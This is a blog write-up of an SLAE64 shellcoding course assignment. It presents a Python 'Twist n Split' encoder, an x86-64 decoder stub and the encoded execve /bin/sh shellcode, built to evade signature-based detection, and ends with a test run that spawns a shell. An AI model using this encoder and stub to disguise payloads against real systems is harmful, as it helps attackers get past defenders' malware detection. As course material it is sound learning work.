Security Tube SLAE64 Course - Assessment 4

Security Tube SLAE64 Course - Assessment 4 - Custom Encoding

Posted: 9 Nov 2017 at 16:11 by Codehead

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the forth assignment; create a custom encoder/decoder to disguise a shellcode payload.

Many security and threat monitoring tools rely on signature matching to identify bad code. A good way to avoid signature based detection is to obscure the content of a payload with encryption or encoding. The same payload can be repeatedly disguised with different obfuscation schemes. Creating a new encoding method is much simpler than building a new payload.

For the assignment, we will design a simple encoding scheme, create an encoding script to disguise our shellcode and write a decoder stub which we will deploy with the payload to rebuild the original code on the fly.

Twist ‘n Split

During the SLAE64 course, Vivek demonstrated a number of encoding techniques including XOR transforms and insertion schemes that added extra data to the code. The assessment calls for an insertion based technique, so I came up with “Twist ‘n’ Split”; for each pair of bytes in the original code, we will swap the order of the bytes and insert a new random value between them.

A simple python script can take some existing shellcode and convert it to this encoded format:

# Assume input in 0xXX,0xXX format
bChunks = sys.argv[1].split(',')

# Do the Twist 'n Split
while len(bChunks) != 0:
    a = bChunks.pop(0)
    b = bChunks.pop(0)
    c = random.randint(1,255)
    sys.stdout.write("0x{0:02x},".format(int(b,16)))
    sys.stdout.write("0x{0:02x},".format(c))
    sys.stdout.write("0x{0:02x},".format(int(a,16)))

The payload to be encoded is a simple execve shell.nasm from the earlier assignments:

global _start
section .text

_start:
    xor rax, rax
    push rax
    pop rdx         
    push rdx
    mov rbx, 0x68732f6e69622f2f ; build //bin/sh
    push rbx        ; copy '//bin/sh' string to stack
    mov rdi, rsp    ; get the address for /bin/sh string in rdi
    push rax        ; build args array, by pushing NULL
    push rdi        ; then pushing string address
    mov rsi, rsp    ; args array address into rsi
    add eax, 59     ; execve
    syscall

The raw extracted shellcode looks like this:

0x48,0x31,0xc0,0x50,0x5a,0x52,0x48,0xbb,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,
0x68,0x53,0x48,0x89,0xe7,0x50,0x57,0x48,0x89,0xe6,0x83,0xc0,0x3b,0x0f,0x05

After encoding, we are left with:

0x31,0x26,0x48,0x50,0x28,0xc0,0x52,0x71,0x5a,0xbb,0xde,0x48,0x2f,0x48,0x2f,
0x69,0x6d,0x62,0x2f,0x6e,0x6e,0x68,0x23,0x73,0x48,0x9f,0x53,0xe7,0x2f,0x89,
0x57,0x0b,0x50,0x89,0x1e,0x48,0x83,0xfe,0xe6,0x3b,0x81,0xc0,0x05,0xd3,0x0f,
0x78,0x56,0x34,0x12

Inline decoding

To execute the payload on a target, we need a header that will restore the original code from the obfuscated data and then execute it. Keeping the header stub code small is a priority and we will overwrite the encoded data with the decoded payload to avoid memory allocation.

Using RSI and RDI with MOVSB means that we can keep pointer management to a minimum. We can manoeuvre RSI around the encoded bytes and RDI will automatically write and advance along the decoded data buffer.

The code snippet below uses jump, call, pop to discover the address of the encoded data, then sets RDI and RSI in their starting positions before entering a decode loop.

_start:
    jmp short _marker
_decode_init:
    pop rdi
    lea rsi, [rdi + 2]
_decode:
    movsb
    sub rsi, 3
    movsb
    add rsi, 4
    jne short _decode
_marker:
    call _decode_init
_shell: 
    db 0x31, 0x26, ...

The decode loop itself is very compact, just 12 bytes.

000000000060007f <_decode>:
  60007f:   a4                      movsb  %ds:(%rsi),%es:(%rdi)
  600080:   48 83 ee 03             sub    $0x3,%rsi
  600084:   a4                      movsb  %ds:(%rsi),%es:(%rdi)
  600085:   48 83 c6 04             add    $0x4,%rsi
  600089:   75 f4                   jne    60007f <_decode>

In the first move, we overwrite 0x31 at position 1 with 0x48 from position 3. Unfortunately, we need the 0x31 value for position 2. We could make the _decode_init code more complex and preserve these starting values, but it is easier to tweak the encoding script to add a single lead-in byte to the start of the encoded buffer and adjust the RSI start position to compensate. This solves the overwrite problem and after the first pass it ceases to be an issue as the gap between the pointers grows quickly through the decoding process.

Writing to `.text`

As we are writing data into the .text section, which is read-only and executable by default, I initially had a workflow that involved building code with nasm, but extracting and executing it in the shellcode_wrapper to avoid segmentation faults. This was annoying enough for me to seek out a better way.

nasm allows arbitrary sections to be defined, but has defaults for .text, .data and other common blocks. We cannot modify the attributes for the .text keyword, but we can define a new section name (Note the case change):

global _start
section .TEXT exec write

_start:
    jmp short _marker
    ...

This .TEXT section is executable and writeable, allowing us to work in nasm and access labels in gdb without any messing around with shellcode extraction and wrappers. This makes debugging and experimentation much easier.

Finishing the decode loop

To signal the completion of the decoding process and start execution of the payload, I considered using a LOOP with a count in RCX. However, this would require the encoding script to insert an RCX value in the initialisation code and avoiding NULL bytes would be tricky when the payload size was over 256 bytes. In the interests of keeping the decoder stub small and allowing arbitrary payload lengths, I decided to use a marker DWORD at the end of the buffer. The value 0x12345678 was selected at random to indicate this stop marker.

Due to fact that RSI is jumping around and not scanning linearly, we need to ensure that we actually stand a chance of landing on the marker location. We can tweak the encoding script to ensure that the buffer contains an even number of bytes, this allows the decoder to check for the end marker once per loop.

_decode:
    movsb
    sub rsi, 3
    movsb
    add rsi, 4
    mov eax, [rsi-2]
    cmp eax, 0x12345678
    jne short _decode
    jmp short _shell
        
_marker:
    call _decode_init
_shell: 
    db 0xff, 0x31, ... 0x78,0x56,0x34,0x12

When the marker is found, the code jumps to _shell and executes the freshly decoded payload.

We now have a robust and compact decoder. The additions to the payload buffer add a maximum of 6 bytes and do not affect the execution in any way, well worth it to keep the code size down.

Completing the encoder

As the decoder stub is complete, we can extract the shellcode for use in the encoder. The shellcode extractor required an update to be case insensitive when seeking out the .text section and also dump the shellcode in two different formats.

The decoder stub and end of buffer marker are added as hex arrays:

decode = [0xeb,0x1b,0x5f,0x48,0x8d,0x77,0x03,0xa4,0x48,0x83,
          0xee,0x03,0xa4,0x48,0x83,0xc6,0x04,0x8b,0x46,0xfe,
          0x3d,0x78,0x56,0x34,0x12,0x75,0xec,0xeb,0x05,0xe8,
          0xe0,0xff,0xff,0xff]

marker = [0x78, 0x56, 0x34, 0x12]

We take the payload data from the first argument to the script and ensure it is an even number of bytes:

bChunks = sys.argv[1].split(',')

# Ensure even count of payload bytes
if len(bChunks)%2 != 0:
    bChunks.append(random.randint(1,255))

Now we can build our complete shellcode string.

The decode header starts the output:

# Add decode header
for d in decode:
    sys.stdout.write("\\x{0:02x}".format(d))

Next, we add a single random byte for the lead-in buffer:

# Insert lead in byte
sys.stdout.write("\\x{0:02x}".format(random.randint(1,255)))

The encoder loop remains the same:

# Do the Twist 'n Split
while len(bChunks) != 0:
    a = bChunks.pop(0)
    b = bChunks.pop(0)
    c = random.randint(1,255)
    sys.stdout.write("\\x{0:02x}".format(int(b,16)))
    sys.stdout.write("\\x{0:02x}".format(c))
    sys.stdout.write("\\x{0:02x}".format(int(a,16)))

Last of all we append the end of buffer marker:

# Insert end marker
for m in marker:
    sys.stdout.write("\\x{0:02x}".format(m))

The full python encoder script with error checking and both output formats is on GitHub at: encoder.py

Testing

Using the execve shellcode with the encoder gives us a complete string of decoder stub plus obfuscated payload:

MBP:slae64$ python3 encoder.py 0x48,0x31,0xc0,0x50,0x5a,0x52,0x48,0xbb,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,
0x53,0x48,0x89,0xe7,0x50,0x57,0x48,0x89,0xe6,0x83,0xc0,0x3b,0x0f,0x05

0xeb,0x1b,0x5f,0x48,0x8d,0x77,0x03,0xa4,0x48,0x83,0xee,0x03,0xa4,0x48,0x83,0xc6,0x04,0x8b,0x46,0xfe,0x3d,0x78,
0x56,0x34,0x12,0x75,0xec,0xeb,0x05,0xe8,0xe0,0xff,0xff,0xff,0x2d,0x31,0x02,0x48,0x50,0x20,0xc0,0x52,0xb7,0x5a,
0xbb,0x89,0x48,0x2f,0x28,0x2f,0x69,0x1a,0x62,0x2f,0x9d,0x6e,0x68,0x86,0x73,0x48,0xc7,0x53,0xe7,0x86,0x89,0x57,
0x08,0x50,0x89,0x42,0x48,0x83,0x19,0xe6,0x3b,0x0f,0xc0,0x05,0xe4,0x0f,0x78,0x56,0x34,0x12,

\xeb\x1b\x5f\x48\x8d\x77\x03\xa4\x48\x83\xee\x03\xa4\x48\x83\xc6\x04\x8b\x46\xfe\x3d\x78\x56\x34\x12\x75\xec
\xeb\x05\xe8\xe0\xff\xff\xff\x01\x31\xfc\x48\x50\xa5\xc0\x52\x20\x5a\xbb\x8a\x48\x2f\xc1\x2f\x69\x63\x62\x2f
\x2b\x6e\x68\x7d\x73\x48\x67\x53\xe7\x6e\x89\x57\x43\x50\x89\x30\x48\x83\x78\xe6\x3b\xd0\xc0\x05\x6f\x0f\x78
\x56\x34\x12

This string can be run using the shellcode wrapper giving us the shell as expected.

MBP:slae64$ gcc -z execstack -fno-stack-protector shellcode_wrapper.c -o shellcode
MBP:slae64$ ./shellcode
Shellcode Length:  84
$ pwd
/home/codehead/SLAE64/misc
$ exit

This concludes the assignment. Coming up with the scheme was easy, but implementing it and producing the encoder/decoder was far harder than I expected.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64-1471

Categories: SLAE64 Assembler Shellcode

Tags: #shellcode #assembler #linux #x64 #Python

Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead